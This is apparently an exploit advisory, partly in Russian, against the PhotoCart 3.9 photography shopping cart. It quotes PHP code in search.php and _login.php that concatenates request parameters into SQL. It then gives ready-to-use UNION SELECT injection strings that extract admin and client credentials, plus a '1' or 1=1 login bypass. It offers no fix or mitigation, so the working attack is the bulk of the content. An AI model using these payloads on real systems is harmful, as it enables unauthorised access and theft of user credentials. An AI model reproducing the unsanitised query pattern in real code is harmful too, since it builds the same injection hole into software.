Author: ~!Dok_tOR!~ Date found: 18.08.08 Product: PhotoCart Version: 3.9 возможно и более ранние версии Type: Photography Shopping Cart URL: www.picturespro.com Vulnerability Class: SQL Injection /[installdir]/search.php Vuln code: PHP: if($_REQUEST['searchby'] == "qtitle") { $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_title LIKE '%".$_REQUEST['qtitle']."%' "; print "Results for Gallery or event name: ".$_REQUEST['qtitle']." "; } if($_REQUEST['searchby'] == "qid") { $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_id='".$_REQUEST['qid']."' "; print "Results for Gallery or event ID: ".$_REQUEST['qid']." "; } if($_REQUEST['searchby'] == "qdate") { $gdate = "".$_REQUEST['qyear']."-".$_REQUEST['qmonth']."-".$_REQUEST['qday'].""; $gal_where['where'] = "WHERE gal_status='1' AND gal_client!='1 '$and_expire AND gal_date='$gdate' "; print "Results for Gallery or event date: ".$_REQUEST['qmonth']."-".$_REQUEST['qday']."-".$_REQUEST['qyear']." "; } magic_quotes_gpc = Off Example: http://[server]/[installdir]/search.php Вводим в поле Gallery or event name: Exploit 1: Code: ' union select 1,2,3,4,5,concat_ws(0x3a,admin_user,admin_pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin/* Exploit 2: Code: ' union select 1,2,3,4,5,concat_ws(0x3a,client_name,client_pass,client_email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from pc_clients/* Authentication Bypass SQL Injection /[installdir]/_login.php Vuln code: PHP: $result = @mysql_query("SELECT * FROM pc_clients WHERE client_email='".$_REQUEST['email']."' AND client_pass='".$_REQUEST['password']."'"); Email Address: 1' or 1=1/* Password: 1' or 1=1/* http://milw0rm.com/exploits/6285
